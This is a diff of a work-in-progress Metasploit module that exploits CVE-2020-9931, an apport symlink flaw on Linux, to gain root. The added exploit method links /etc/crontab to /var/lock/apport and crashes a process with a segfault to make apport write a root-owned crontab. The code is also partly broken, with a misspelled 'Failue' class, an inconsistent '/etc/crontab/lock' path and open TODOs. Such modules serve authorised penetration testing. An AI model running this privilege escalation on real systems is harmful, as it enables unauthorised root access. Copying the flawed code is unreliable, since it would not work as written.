Begin exploit

Author: gardnerapp

modules/exploits/linux/local/cve_2020_9931_apport_symlink_privesc.rb

@@ -3,6 +3,8 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
   include Msf::Post::Linux::System
+  include Msf::Post::File
+  include Msf::Post::File::FileStat
 
   # TODO get exact apport version after setting up a test environment
   # TODO targets in the initialize method and how they work
@@ -49,9 +51,6 @@ def initialize(info = {})
           'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
         },
       )
-      register_options [
-      	OptString.new('Cron Name', [true, 'Name of the Crontab file', Rex::Text.rand_text_alpha(rand(8..12))])
-      ]
     )
   end
 
@@ -93,8 +92,21 @@ def check
   end
 
   def exploit
-    # Methods for 
-    # symlinking /var/lock/apport to /etc/crontab
+    # Create symlink
+    # TODO error handling here, perhaps try and catch statement
+    # might need to change linked directory
+    cmd_exec 'ln -s /etc/crontab /var/lock/apport'
+
+    # Crash with segfault to trigger apport
+    cmd_exec 'sleep 10s & kill -11 $!'
+
+    # need method for seeing if file is owned by root and combine with and gate
+    # if uid method does not work remove Msf::Post::File::FileStat
+    if !writable?('/etc/crontab/lock') || uid('/etc/crontab/lock') != 0
+      fail_with(Failue::NotFound, 'Exploit was unable to create a crontab owned by root.')
+    end
+
+  
     # Touching a file to this
     # verifying the permissions on the file (root ownership)
     # writing payloads